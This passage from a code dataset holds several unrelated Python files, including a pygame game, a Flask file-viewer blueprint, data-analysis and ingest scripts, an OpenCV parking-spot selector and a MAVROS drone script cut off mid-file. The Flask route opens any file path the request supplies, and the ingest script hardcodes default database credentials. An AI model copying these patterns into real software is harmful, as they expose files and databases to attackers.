pygame.transform.scale(pygame.image.load(\"./sprite/player/Glitchman_Walk7new_bw.png\").convert_alpha(),(PLAYERWIDTH,PLAYERHEIGHT))\n\nPLAYERGLITCHBW = pygame.transform.scale(pygame.image.load(\"./sprite/player_glitch_bw.png\"),(int(GLITCHWIDTH),int(GLITCHHEIGHT)))\n\nRADIUS = 20\n \nclass Player:\n def __init__(self,x,y,width,height):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.playerrect = Rect(0,0,self.width,self.height)\n self.playerrect.center = (self.x,self.y)\n\nclass Enemy:\n def __init__(self,width,height):\n self.width = width\n self.height = height\n self.enemyrect = Rect(0,0,width,height)\n self.enemylist = []\n\ndef startscreen():\n run = True\n while run:\n Display.fill(DARKERGREY)\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n if event.type == KEYDOWN:\n if event.key == K_s:\n run = False\n pygame.draw.rect(Display, GREY, Rect((TVSCREENWIDTH - SCREENWIDTH)/2,(TVSCREENHEIGHT - SCREENHEIGHT)/2,SCREENWIDTH,SCREENHEIGHT))\n pygame.draw.rect(Display, WHITE, Rect((TVSCREENWIDTH - SCREENWIDTH)/2,(TVSCREENHEIGHT - SCREENHEIGHT)/2,SCREENWIDTH,SCREENHEIGHT),3)\n \n pygame.draw.circle(Display,DARKGREY,(int(TVSCREENWIDTH - math.ceil((TVSCREENWIDTH - SCREENWIDTH)/2) - RADIUS),\n int(TVSCREENHEIGHT - math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/2) + math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/4))),RADIUS)\n\n pygame.draw.circle(Display,BLACK,(int(TVSCREENWIDTH - math.ceil((TVSCREENWIDTH - SCREENWIDTH)/2) - RADIUS),\n int(TVSCREENHEIGHT - math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/2) + math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/4))),RADIUS,3)\n\n pygame.draw.circle(Display,DARKGREY,(int(TVSCREENWIDTH - math.ceil((TVSCREENWIDTH - SCREENWIDTH)/2) - RADIUS*4),\n int(TVSCREENHEIGHT - math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/2) + math.ceil((TVSCREENHEIGHT - 
SCREENHEIGHT)/4))),RADIUS)\n\n pygame.draw.circle(Display,BLACK,(int(TVSCREENWIDTH - math.ceil((TVSCREENWIDTH - SCREENWIDTH)/2) - RADIUS*4),\n int(TVSCREENHEIGHT - math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/2) + math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/4))),RADIUS,3)\n\n pygame.draw.circle(Display,DARKGREY,(int(TVSCREENWIDTH - math.ceil((TVSCREENWIDTH - SCREENWIDTH)/2) - RADIUS*7),\n int(TVSCREENHEIGHT - math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/2) + math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/4))),RADIUS)\n\n pygame.draw.circle(Display,BLACK,(int(TVSCREENWIDTH - math.ceil((TVSCREENWIDTH - SCREENWIDTH)/2) - RADIUS*7),\n int(TVSCREENHEIGHT - math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/2) + math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/4))),RADIUS,3)\n pygame.display.update()\n pygame.time.Clock().tick(FPS)\n \n pass\n\ndef endscreen():\n pass\n\ndef main():\n run = True\n \n TheTime = 0\n Start = time.time()#start time\n\n #use to check the FPS\n frame = 0;\n realtimeFPS = 0\n previousFrame = 0\n\n #accurate timing\n frametiming = 0\n\n distance = 2*SCREENHEIGHT/LANE - 1*SCREENHEIGHT/LANE\n\n player = Player(PLAYERWIDTH/2 + (TVSCREENWIDTH - SCREENWIDTH)/2,(SCREENHEIGHT/LANE*3/2) + (TVSCREENHEIGHT - SCREENHEIGHT)/2,HITBOXWIDTH,HITBOXHEIGHT)\n enemy = Enemy(ENEMYWIDTH,ENEMYHEIGHT)\n\n glitch = False\n GlitchStart = 0\n glitchcount = 0\n\n spawnBoss = 0 #condition\n\n chance = 2\n collided = False\n\n playercount = 0\n \n while run:\n #for FPS\n End = time.time()#end time\n frame += 1\n frametiming += 1\n if (int(End) - int(Start) == 1):\n TheTime += 1\n Start = time.time()\n #print(TheTime)\n realtimeFPS = (frame - previousFrame)\n #print(\"RealTimeFPS:\", realtimeFPS,\"\\n\")\n previousFrame = frame \n\n \n\n #enemy spawn\n spawnBoss = random.randrange(0,5,1)\n if (frametiming % (FPS*2) == 0):\n if (spawnBoss == 1):\n enemyrect = Rect(0,0,ENEMYWIDTH,SCREENHEIGHT - SCREENHEIGHT/LANE)\n enemyrect.centerx = SCREENWIDTH - ENEMYWIDTH\n enemyrect.centery = SCREENHEIGHT/LANE * LANE/2 + SCREENHEIGHT/LANE/2 + (TVSCREENHEIGHT - SCREENHEIGHT)/2\n enemy.enemylist.append(enemyrect)\n else:\n randomlane = random.randrange((SCREENHEIGHT/LANE)*3/2, SCREENHEIGHT, distance)#the lane pixel\n enemyrect = Rect(0,0,ENEMYWIDTH,ENEMYHEIGHT)\n enemyrect.centerx = SCREENWIDTH - ENEMYWIDTH\n enemyrect.centery = randomlane + (TVSCREENHEIGHT - SCREENHEIGHT)/2\n enemy.enemylist.append(enemyrect)\n \n \n Display.fill(DARKERGREY)\n\n #animation count for player\n playercount += 1\n\n if playercount == 7*(FPS/14):\n playercount = 0\n \n #Inputs\n key = pygame.key.get_pressed()\n\n if (key[K_k]):\n print(\"glitching\")\n \n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n if event.type == KEYDOWN:\n if event.key == K_w:\n #print(\"up\")\n if (player.y != (SCREENHEIGHT/LANE)*3/2 + (TVSCREENHEIGHT - SCREENHEIGHT)/2):#2nd lane\n player.y -= distance\n player.playerrect.centery = player.y\n if event.key == K_s:\n #print(\"down\")\n if (player.y != (SCREENHEIGHT) - (SCREENHEIGHT/LANE)/2 + (TVSCREENHEIGHT - SCREENHEIGHT)/2):#last lane\n player.y += distance\n player.playerrect.centery = player.y\n if event.key == K_j:\n #print(\"glitch\")\n if glitch == False:\n glitch = True\n\n\n #glitch logic\n if glitch == True:\n glitchcount += 1\n player.playerrect.height = GLITCHHEIGHT\n player.playerrect.width = GLITCHWIDTH\n player.playerrect.centery = player.y\n if glitchcount == int(0.75*FPS): #30 = 1 seconds\n glitchcount = 0\n glitch = False\n \n elif glitch == False:\n player.playerrect.height = 
HITBOXHEIGHT\n player.playerrect.width = HITBOXWIDTH\n player.playerrect.centery = player.y\n\n #enemy moving logic\n for i in range(len(enemy.enemylist)):\n enemy.enemylist[i].centerx -= ENEMYSPEED\n\n\n #collide logic\n for i in range(len(enemy.enemylist)):\n if (player.playerrect.colliderect(enemy.enemylist[i])) and player.playerrect.height == PLAYERHEIGHT and collided == False:\n chance -= 1\n collided = True\n\n if collided == True:\n if enemy.enemylist[0].right <= (TVSCREENWIDTH - SCREENWIDTH):\n collided = False\n\n \n #destroy enemy item\n for i in range(len(enemy.enemylist)):\n if enemy.enemylist[i].right <= (TVSCREENWIDTH - SCREENWIDTH):\n enemy.enemylist.remove(enemy.enemylist[i])\n break\n\n #game over logic\n if chance == 0:\n run = False\n \n\n #draw\n pygame.draw.rect(Display, GREY, Rect((TVSCREENWIDTH - SCREENWIDTH)/2,(TVSCREENHEIGHT - SCREENHEIGHT)/2,SCREENWIDTH,SCREENHEIGHT))\n for i in range(LANE):\n pygame.draw.line(Display,WHITE,((TVSCREENWIDTH - SCREENWIDTH)/2, ((i+1)*(SCREENHEIGHT)/LANE) + (TVSCREENHEIGHT - SCREENHEIGHT)/2),(SCREENWIDTH + (TVSCREENWIDTH - SCREENWIDTH)/2, ((i+1)*(SCREENHEIGHT)/LANE) + (TVSCREENHEIGHT - SCREENHEIGHT)/2),3)\n pygame.draw.rect(Display, WHITE, Rect((TVSCREENWIDTH - SCREENWIDTH)/2,(TVSCREENHEIGHT - SCREENHEIGHT)/2,SCREENWIDTH,SCREENHEIGHT),3)\n \n pygame.draw.circle(Display,DARKGREY,(int(TVSCREENWIDTH - math.ceil((TVSCREENWIDTH - SCREENWIDTH)/2) - RADIUS),\n int(TVSCREENHEIGHT - math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/2) + math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/4))),RADIUS)\n\n pygame.draw.circle(Display,BLACK,(int(TVSCREENWIDTH - math.ceil((TVSCREENWIDTH - SCREENWIDTH)/2) - RADIUS),\n int(TVSCREENHEIGHT - math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/2) + math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/4))),RADIUS,3)\n\n pygame.draw.circle(Display,DARKGREY,(int(TVSCREENWIDTH - math.ceil((TVSCREENWIDTH - SCREENWIDTH)/2) - RADIUS*4),\n int(TVSCREENHEIGHT - math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/2) + math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/4))),RADIUS)\n\n pygame.draw.circle(Display,BLACK,(int(TVSCREENWIDTH - math.ceil((TVSCREENWIDTH - SCREENWIDTH)/2) - RADIUS*4),\n int(TVSCREENHEIGHT - math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/2) + math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/4))),RADIUS,3)\n\n pygame.draw.circle(Display,DARKGREY,(int(TVSCREENWIDTH - math.ceil((TVSCREENWIDTH - SCREENWIDTH)/2) - RADIUS*7),\n int(TVSCREENHEIGHT - math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/2) + math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/4))),RADIUS)\n\n pygame.draw.circle(Display,BLACK,(int(TVSCREENWIDTH - math.ceil((TVSCREENWIDTH - SCREENWIDTH)/2) - RADIUS*7),\n int(TVSCREENHEIGHT - math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/2) + math.ceil((TVSCREENHEIGHT - SCREENHEIGHT)/4))),RADIUS,3)\n\n #pygame.draw.rect(Display,BLUE,player.playerrect,1)\n if chance == 2:\n if player.playerrect.height == PLAYERHEIGHT:\n if (playercount <= 1*(FPS/14)):\n Display.blit(WALK1,player.playerrect)\n\n elif(playercount <= 2*(FPS/14)):\n Display.blit(WALK2,player.playerrect)\n\n elif(playercount <= 3*(FPS/14)):\n Display.blit(WALK3,player.playerrect)\n\n elif(playercount <= 4*(FPS/14)):\n Display.blit(WALK4,player.playerrect)\n\n elif(playercount <= 5*(FPS/14)):\n Display.blit(WALK5,player.playerrect)\n\n elif(playercount <= 6*(FPS/14)):\n Display.blit(WALK6,player.playerrect)\n\n else:\n Display.blit(WALK7,player.playerrect)\n else:\n Display.blit(PLAYERGLITCH, player.playerrect)\n\n elif chance == 1:\n if player.playerrect.height == PLAYERHEIGHT:\n if (playercount <= 1*(FPS/14)):\n 
Display.blit(WALK1BW,player.playerrect)\n\n elif(playercount <= 2*(FPS/14)):\n Display.blit(WALK2BW,player.playerrect)\n\n elif(playercount <= 3*(FPS/14)):\n Display.blit(WALK3BW,player.playerrect)\n\n elif(playercount <= 4*(FPS/14)):\n Display.blit(WALK4BW,player.playerrect)\n\n elif(playercount <= 5*(FPS/14)):\n Display.blit(WALK5BW,player.playerrect)\n\n elif(playercount <= 6*(FPS/14)):\n Display.blit(WALK6BW,player.playerrect)\n\n else:\n Display.blit(WALK7BW,player.playerrect)\n else:\n Display.blit(PLAYERGLITCHBW, player.playerrect)\n\n \n\n for i in range(len(enemy.enemylist)):\n pygame.draw.rect(Display,RED,enemy.enemylist[i])\n if (enemy.enemylist[i].height == ENEMYHEIGHT):\n Display.blit(ENEMYGLITCH, enemy.enemylist[i])\n elif (enemy.enemylist[i].height != ENEMYHEIGHT):\n amount = int(math.ceil(enemy.enemylist[i].height / ENEMYHEIGHT))\n for j in range(amount):\n Display.blit(ENEMYGLITCH, Rect(enemy.enemylist[i].left, enemy.enemylist[i].top + (j*ENEMYHEIGHT), enemy.enemylist[i].width, enemy.enemylist[i].height + (j*ENEMYHEIGHT)))\n\n Time = TheFont.render(\"Time: \" + str(TheTime) + \"s\", True, BLACK)\n TimeRect = Time.get_rect()\n TimeRect.center = (TimeRect.width/2 + (TVSCREENWIDTH - SCREENWIDTH)/2 + 10, TimeRect.height/2 + (TVSCREENHEIGHT - SCREENHEIGHT)/2)\n Display.blit(Time,TimeRect)\n\n Chance = TheFont.render(\"Chance: \" + str(chance), True, BLACK)\n ChanceRect = Chance.get_rect()\n ChanceRect.center = (ChanceRect.width/2 + (TVSCREENWIDTH - SCREENWIDTH)/2 + 10, TimeRect.height + ChanceRect.height/2 + (TVSCREENHEIGHT - SCREENHEIGHT)/2)\n Display.blit(Chance, ChanceRect)\n \n\n pygame.display.update()\n pygame.time.Clock().tick(FPS)\n \nstartscreen()\nmain()\ntime.sleep(2)\npygame.quit()\nsys.exit()\n\n","sub_path":"Glitchman TV.py","file_name":"Glitchman TV.py","file_ext":"py","file_size_in_byte":16236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"21594709","text":"from flask import Blueprint\n\nfrom flask import render_template, request, redirect\nfrom flask import url_for, make_response\n\nfrom ..api import SessionCore\nfrom ..items.Session import Session\n\nmod = Blueprint('pages', __name__, )\n\n@mod.route('/', methods=[\"GET\", \"POST\"])\ndef index():\n error, sessions = SessionCore.getRecent(5)\n return render_template('index.html', sessions=sessions, error=error)\n\n\n@mod.route('/file', methods=[\"GET\"])\ndef file():\n filePath = request.args.get('path')\n\n if filePath == None:\n return render_template('invalid.html')\n\n sessionObj = SessionCore.sessionExist(filePath)\n\n if not sessionObj:\n sessionObj = SessionCore.createNewSession(filePath)\n\n # Save content of original text file into temp file\n import shutil\n shutil.copyfileobj(open(filePath), open(sessionObj.getTName(), 'wb'))\n\n\n response = make_response(render_template('file.html', file=filePath))\n\n response.set_cookie('fname', sessionObj.getFName())\n response.set_cookie('tname', sessionObj.getTName())\n response.set_cookie('lastprofile', sessionObj.getLastProfileId())\n\n return response\n\n\n@mod.route('/sessions', methods=[\"GET\"])\ndef sessions():\n return 'Sessions'\n","sub_path":"app/views/pages.py","file_name":"pages.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"539232087","text":"import pandas as pd\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nfilename = 'Ajour-20170912.txt'\nrows = 
open(filename).read().split('\\n')\n\nrows = [i for i in rows if 'eventhandling' in i]\n\n\nevs=[]\ndurs=[]\nfor x in rows:\n fields = x.split(' ')\n if len(fields)<=6: continue\n dur = fields[3]\n ev = fields[6]\n if 'RecordedEvent' in ev: continue\n #if int(dur) < 2500:\n # continue\n evs.append(str(ev))\n durs.append(int(dur))\n print(dur,ev)\n #df.append( [{'ev':ev, 'dur':dur}] )\n#print (len(rows))\n\ndf = pd.DataFrame( {'ev': evs, 'dur': durs } ) #columns=('ev', 'dur'))\n\n\nprint(df.head())\nprint('type?', df.dtypes)\nprint('\\n')\ngr = df.groupby('ev')\n\ndf2 = pd.DataFrame({col:vals['dur'] for col,vals in gr})\n\nmeds = df2.median()\n#meds.sort(ascending=False)\nmeds.sort_values(ascending=False, inplace=True)\ndf2 = df2[meds.index]\ndf2.boxplot(rot=89) #, showmeans=True)\n\nplt.show()\n\n\nprint('\\n')\nprint(gr['dur'].agg(np.size)) \nprint('\\n')\n\n\nprint('\\n')\nprint(gr['dur'].agg(np.mean)) \nprint('\\n')\n\ndf.boxplot(column='dur', by='ev', rot=89, showmeans=True) #, meanline=True)\n#df.boxplot(column='dur', by='ev') #, rot=89, showmeans=True) #, meanline=True)\n\nplt.show()","sub_path":"matplot_groups/avgEventTimes.py","file_name":"avgEventTimes.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"613163798","text":"import cv2\r\nimport csv\r\nimport time\r\nimport os\r\nfrom time import gmtime, strftime\r\nfrom tkinter import messagebox\r\nfrom tkinter import *\r\n\r\nisSelecting = False\r\nroi = []\r\nw = 1\r\ncsv_data = []\r\n\r\n#Tkinter UI Window Class\r\nclass Window(Frame):\r\n\r\n def __init__(self, master=None):\r\n Frame.__init__(self, master) \r\n self.master = master\r\n self.init_window()\r\n\r\n #Creation of init_window\r\n def init_window(self):\r\n self.master.title(\"Save Session\")\r\n self.pack(fill=BOTH, expand=1)\r\n\r\n L1 = Label(self, text=\"Name Of Session:\")\r\n L1.place(x=20, y = 20)\r\n \r\n self.E1 = Entry(self, bd =5)\r\n self.E1.place(x=10, y= 50)\r\n\r\n ButtonEntry = Button(self, text=\"Save Session\",command=self.saveInputCSVName, height = 2, width = 20)\r\n ButtonEntry.place(x=5,y=100) \r\n\r\n def saveInputCSVName(self):\r\n returnCSV = saveCSVData(self.E1.get())\r\n print(returnCSV)\r\n exit()\r\n\r\n#Save CSV Data\r\ndef saveCSVData(name):\r\n with open('Choose_Parking_Spots/csv/' + name + '.csv','w') as fp:\r\n writer = csv.writer(fp, delimiter=',')\r\n writer.writerows(csv_data)\r\n\r\n\r\n#Get Recent Created Folder and grab image\r\ndef returnOriginalImage():\r\n directory = \"Picture_Saves/\"\r\n image_directory = max([os.path.join(directory,d) for d in os.listdir(directory)], key=os.path.getmtime)\r\n image_read_path = image_directory + \"/initial.png\"\r\n print(image_read_path)\r\n img = cv2.imread(image_read_path,cv2.IMREAD_UNCHANGED)\r\n #img = cv2.resize(img, (960, 540)) \r\n return img\r\n\r\n#Used when user doesn't want to keep rectangle\r\ndef restoreBackupImage():\r\n currentImage = backupImage\r\n\r\n#Updates backup image to print a new rectangle on area\r\ndef updateBackupImage( newImage ):\r\n backupImage = newImage\r\n\r\n#Handles events pertaning to the main opencv window\r\ndef eventROI(event, x, y, flags, param):\r\n global isSelecting, roi, w, csv_string\r\n if event == cv2.EVENT_LBUTTONDOWN:\r\n isSelecting = True\r\n roi = [x,y,x,y]\r\n elif event == cv2.EVENT_MOUSEMOVE:\r\n if isSelecting == True:\r\n roi[2] = x\r\n roi[3] = y\r\n elif event == cv2.EVENT_LBUTTONUP:\r\n \r\n #answer = 
messagebox.askyesno(\"Question\",\"Keep Recent Chosen Parking Spot?\")\r\n answer = \"Yes\"\r\n if answer == \"Yes\":\r\n isSelecting = False\r\n roi[2] = x\r\n roi[3] = y\r\n print (w,y1,y2,x1,x2)\r\n #Create list to put into other csv list\r\n temp_list = [w,roi[0],roi[1],roi[2],roi[3]]\r\n csv_data.append(temp_list)\r\n #draw rectangles and save as new display image\r\n cv2.rectangle(backupImage, (roi[0],roi[1]), (roi[2], roi[3]), (0,255,0),2)\r\n updateBackupImage(currentImage)\r\n w = w + 1\r\n else:\r\n isSelecting = False\r\n restoreBackupImage()\r\n\r\n#Display promt for name\r\ndef displayPromtForFileName():\r\n top = Tk()\r\n top.geometry(\"200x160\")\r\n app = Window(top)\r\n top.mainloop() \r\n\r\n\r\n \r\n\r\n#Init Vars\r\nwindowNameMain = 'Choose Parking Spaces'\r\nwindowCropName='Parking Space: '\r\nesc_keycode = 27\r\nwait_time=1\r\ncurrentImage = returnOriginalImage()\r\nbackupImage = returnOriginalImage()\r\n\r\n\r\nif currentImage is not None:\r\n print(\"Cloned current image\")\r\n clone = backupImage.copy()\r\n cv2.namedWindow(windowNameMain, cv2.WINDOW_AUTOSIZE)\r\n cv2.setMouseCallback(windowNameMain, eventROI)\r\n\r\n while True:\r\n cv2.imshow(windowNameMain, currentImage)\r\n\r\n if len(roi) == 4:\r\n currentImage = backupImage.copy()\r\n roi = [0 if i < 0 else i for i in roi]\r\n cv2.rectangle(currentImage, (roi[0],roi[1]), (roi[2], roi[3]), (0,255,0),2)\r\n if roi[0] > roi[2]:\r\n x1 = roi[2]\r\n x2 = roi[0]\r\n else:\r\n x1 = roi[0]\r\n x2 = roi[2]\r\n if roi[1] > roi[3]:\r\n y1 = roi[3]\r\n y2 = roi[1]\r\n else:\r\n y1 = roi[1]\r\n y2 = roi[3]\r\n #Displays each car in seperate window for debugging\r\n crop_img = clone[y1 : y2,x1 : x2]\r\n\r\n if len(crop_img) and not isSelecting:\r\n cv2.namedWindow(windowCropName + \" \" + str(w - 1), cv2.WINDOW_AUTOSIZE)\r\n cv2.imshow(windowCropName + \" \" + str(w - 1), crop_img)\r\n \r\n k = cv2.waitKey(wait_time)\r\n if k == esc_keycode:\r\n cv2.destroyAllWindows()\r\n displayPromtForFileName()\r\n break\r\n\r\nelse:\r\n print ('''Error: Image Not Found''')","sub_path":"Choose_Parking_Spots/crop_image_new.py","file_name":"crop_image_new.py","file_ext":"py","file_size_in_byte":4670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"300047637","text":"import pandas as pd\nfrom pathlib import Path\nfrom sqlalchemy import create_engine\n\ncsv_to_db_mapper = {\n \"Name\": \"name\",\n \"San Francisco County\": \"sf_county\",\n \"Alameda County\": \"alameda_county\",\n \"San Mateo County\": \"san_mateo_county\",\n \"Contra Costa County\": \"contra_costa_county\",\n \"Santa Clara County\": \"santa_clara_county\",\n \"County\": \"county\",\n \"Category\": \"category\",\n \"Black Owned\": \"black_owned\",\n \"LGBTQ\": \"lgbtq\",\n \"Women\": \"women\",\n \"Who Applies\": \"who_applies\",\n \"100 or fewer employees\": \"_100_or_fewer\",\n \"500 or fewer employees\": \"_500_or_fewer\",\n \"750 or fewer employees\": \"_750_or_fewer\",\n \"750 or more\": \"_750_more\",\n \"Type of Relief\": \"relief_type\",\n \"Award Type\": \"award_type\",\n \"Award Amount Specified\": \"award_amount_specified\",\n \"Max Award Amount\": \"max_award_amount\",\n \"Interest Rate Applicable\": \"interest_rate_applicable\",\n \"Interest rate\": \"interest_rate\",\n \"Type of Support\": \"support_type\",\n \"Public or Private\": \"sector_type\",\n \"Type Entity Offering Support\": \"supported_entity\",\n \"Name of Entity\": \"entity_name\",\n \"Is there a Deadline\": \"deadline_applicable\",\n 
\"Deadline\": \"deadline\",\n \"English\": \"english\",\n \"Spanish\": \"spanish\",\n \"Chinese\": \"chinese\",\n \"Website\": \"website_url\",\n \"Other Details\": \"description\"\n}\n\n\ndef main():\n connection = create_engine('postgresql://postgres:postgres@localhost:5000/bar')\n scripts_file = Path(Path(__file__).absolute().parent, \"raw_data.csv\")\n df = pd.read_csv(scripts_file)\n df = df.iloc[:, :-5]\n df = df.rename(columns=csv_to_db_mapper)\n df.drop(df[df[\"name\"].isna()].index, inplace=True)\n df.to_sql('relief', connection, if_exists=\"replace\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"scripts/ingest_raw_data.py","file_name":"ingest_raw_data.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"640646354","text":"#!/usr/bin/env python\r\n# coding: utf-8\r\n\r\n\"\"\"class like gamepad\"\"\"\r\nimport pygame\r\nfrom pygame.locals import *\r\nimport sys\r\n\r\n# 画面サイズ\r\nSCREEN_W, SCREEN_H = 640, 480\r\n\r\n\r\nclass GamePad:\r\n \"\"\"ゲームパッドクラス\"\"\"\r\n __state = [[] for j in range(2)]\r\n __double_buffer_idx = 0\r\n\r\n def __init__(self):\r\n \"\"\"コンストラクタ\"\"\"\r\n self.__state[0] = pygame.key.get_pressed()\r\n self.__state[1] = self.__state[0]\r\n\r\n def update(self):\r\n \"\"\"キーの状態を更新する\"\"\"\r\n self.__double_buffer_idx ^= 1\r\n self.__state[self.__double_buffer_idx] = pygame.key.get_pressed()\r\n\r\n def is_triggered(self, pygame_key_code):\r\n \"\"\"キーが押された瞬間をチェック\"\"\"\r\n idx = self.__double_buffer_idx\r\n key = pygame_key_code\r\n return self.__state[idx][key] and \\\r\n not self.__state[1-idx][key]\r\n\r\n def is_released(self, pygame_key_code):\r\n \"\"\"キーが離された瞬間をチェック\"\"\"\r\n idx = self.__double_buffer_idx\r\n key = pygame_key_code\r\n return not self.__state[idx][key] and \\\r\n self.__state[1-idx][key]\r\n\r\n def is_pressed(self, pygame_key_code):\r\n \"\"\"キーが押されている状態をチェック\"\"\"\r\n idx = self.__double_buffer_idx\r\n key = pygame_key_code\r\n return self.__state[idx][key] and \\\r\n self.__state[1-idx][key]\r\n\r\n def is_on(self, pygame_key_code):\r\n \"\"\"キーが押されているかをチェック\"\"\"\r\n idx = self.__double_buffer_idx\r\n key = pygame_key_code\r\n return self.__state[idx][key]\r\n\r\n\r\ndef main():\r\n \"\"\"エントリポイント\"\"\"\r\n # pygame初期化\r\n pygame.init()\r\n\r\n # 画面サイズを設定\r\n screen = pygame.display.set_mode((SCREEN_W, SCREEN_H))\r\n\r\n # タイトルバーの文字列を設定\r\n pygame.display.set_caption(u\"ゲームパッドのようなクラス\")\r\n\r\n # clockオブジェクトの取得\r\n clock = pygame.time.Clock()\r\n\r\n # 動作確認用のオブジェクト情報\r\n x = 0\r\n y = 0\r\n RECT_SIZE = 10\r\n\r\n # GamePadの作成\r\n pad = GamePad()\r\n\r\n # ゲームループ\r\n while True:\r\n # FPSを60に固定\r\n clock.tick(60)\r\n\r\n # 画面を青色で塗りつぶす\r\n screen.fill((0, 0, 255))\r\n\r\n # 押されているキーの状態を取得\r\n pressed_keys = pygame.key.get_pressed()\r\n if pad.is_pressed(K_LEFT):\r\n x -= 2\r\n if pad.is_pressed(K_RIGHT):\r\n x += 2\r\n if pad.is_pressed(K_UP):\r\n y -= 2\r\n if pad.is_pressed(K_DOWN):\r\n y += 2\r\n\r\n # キーの状態を確認\r\n pad.update()\r\n if pad.is_triggered(K_SPACE):\r\n print(\"triggered\")\r\n #print(pad._GamePad__state[0][K_SPACE])\r\n #print(pad._GamePad__state[0][K_SPACE])\r\n #print(pad._GamePad__state[1][K_SPACE])\r\n if pad.is_pressed(K_SPACE):\r\n print(\"pressed\")\r\n if pad.is_released(K_SPACE):\r\n print(\"released\")\r\n #if pad.is_on(K_SPACE):\r\n # print(\"on\")\r\n\r\n # 句形の描画\r\n pygame.draw.rect(screen, (255, 255, 0), Rect(x, y, RECT_SIZE, RECT_SIZE))\r\n\r\n # 画面を更新\r\n pygame.display.update()\r\n # イベント処理\r\n 
for event in pygame.event.get():\r\n # 終了イベント\r\n if event.type == QUIT:\r\n sys.exit()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n","sub_path":"12_class_like_gamepad.py","file_name":"12_class_like_gamepad.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"243943322","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.5 (3351)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/DeepBrainSeg/helpers/dcm2niftii.py\n# Compiled at: 2019-11-11 08:44:10\n# Size of source mod 2**32: 998 bytes\nimport os, sys, numpy as np, dicom2nifti\nfrom time import gmtime, strftime\nimport dicom2nifti.settings as settings\n\ndef singleDicom2nifti(input_path, output_path, verbose=False):\n \"\"\"\n \"\"\"\n if not os.path.exists(input_path):\n raise ValueError(\"Path doesn't exist\")\n output_dir = os.path.dirname(output_path)\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n if verbose:\n print('[INFO: DeepBrainSeg] (' + strftime('%a, %d %b %Y %H:%M:%S +0000', gmtime()) + ') ' + 'Working on: {}'.format(input_path))\n dicom2nifti.dicom_series_to_nifti(input_path, output_path)\n\n\ndef convertDcm2nifti(path_json, output_dir, verbose=False):\n \"\"\"\n path_json: {'key1': path1, 'key2': path2}\n output_dir: nifty save dir path\n \"\"\"\n for key in path_json.keys():\n input_path = path_json[key]\n output_path = os.path.join(output_dir, key + '.nii.gz')\n singleDicom2nifti(input_path, output_path, verbose)","sub_path":"pycfiles/DeepBrainSeg-0.2.0-py3.5/dcm2niftii.cpython-35.py","file_name":"dcm2niftii.cpython-35.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"338117519","text":"#!/usr/bin/env python\nimport rospy\nimport mavros\nimport mavros.command\nimport mavros_msgs.msg\nimport mavros_msgs.srv\nimport time\nfrom mavros.utils import *\nfrom std_msgs.msg import Header\nfrom mavros_msgs.msg import PositionTarget\nfrom mavros_msgs.msg import State\nfrom mavros_msgs.srv import SetMode \nfrom mavros_msgs.srv import CommandBool\nfrom mavros import setpoint as SP\n\nstate = mavros_msgs.msg.State;\ndef state_callback(msg):\n state = msg \n #print(\"CurrentMode:\",state.mode)\n #print(\"CurrentMode:\",state.armed)\n return 0\n\ndef main():\n rospy.init_node('offboardX')\n rate=rospy.Rate(20)\n mavros.set_namespace('/mavros')\n state_sub = rospy.Subscriber(mavros.get_topic('state'),mavros_msgs.msg.State,state_callback)\n arming = rospy.ServiceProxy('/mavros/cmd/arming',mavros_msgs.srv.CommandBool)\n #set_mode=rospy.ServiceProxy('/mavros/set_mode',SetMode)\n set_mode=rospy.ServiceProxy('/mavros/set_mode',mavros_msgs.srv.SetMode)\n #local_pub = rospy.Publisher(mavros.get_topic('PositionTarget'),mavros_msgs.msg.PositionTarget,queue_size=10)\n local_pub = rospy.Publisher(mavros.get_topic('PositionTarget'),mavros_msgs.msg.PositionTarget,queue_size=10)\n pose = PositionTarget()\n pose.header = Header()\n pose.header.frame_id=\"att_pose\"\n pose.header.stamp=rospy.Time.now()\n pose.position.x=0\n pose.position.y=0\n 